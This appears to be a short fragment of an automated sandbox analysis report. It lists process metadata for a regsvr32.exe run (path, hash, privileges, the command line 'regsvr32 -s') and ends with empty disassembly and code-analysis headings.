                                                                                                                                                                      Imagebase:0x12f0000
                                                                                                                                                                      File size:20992 bytes
                                                                                                                                                                      MD5 hash:426E7499F6A7346F0410DEAD0805586B
                                                                                                                                                                      Has elevated privileges:true
                                                                                                                                                                      Has administrator privileges:true
                                                                                                                                                                      Programmed in:C, C++ or other language
                                                                                                                                                                      Reputation:high

                                                                                                                                                                      General

                                                                                                                                                                      Start time:16:32:55
                                                                                                                                                                      Start date:09/04/2021
                                                                                                                                                                      Path:C:\Windows\SysWOW64\regsvr32.exe
                                                                                                                                                                      Wow64 process (32bit):true
                                                                                                                                                                      Commandline:regsvr32 -s
                                                                                                                                                                      Imagebase:0x7ff797770000
                                                                                                                                                                      File size:20992 bytes
                                                                                                                                                                      MD5 hash:426E7499F6A7346F0410DEAD0805586B
                                                                                                                                                                      Has elevated privileges:true
                                                                                                                                                                      Has administrator privileges:true
                                                                                                                                                                      Programmed in:C, C++ or other language
                                                                                                                                                                      Reputation:high

                                                                                                                                                                      Disassembly

                                                                                                                                                                      Code Analysis
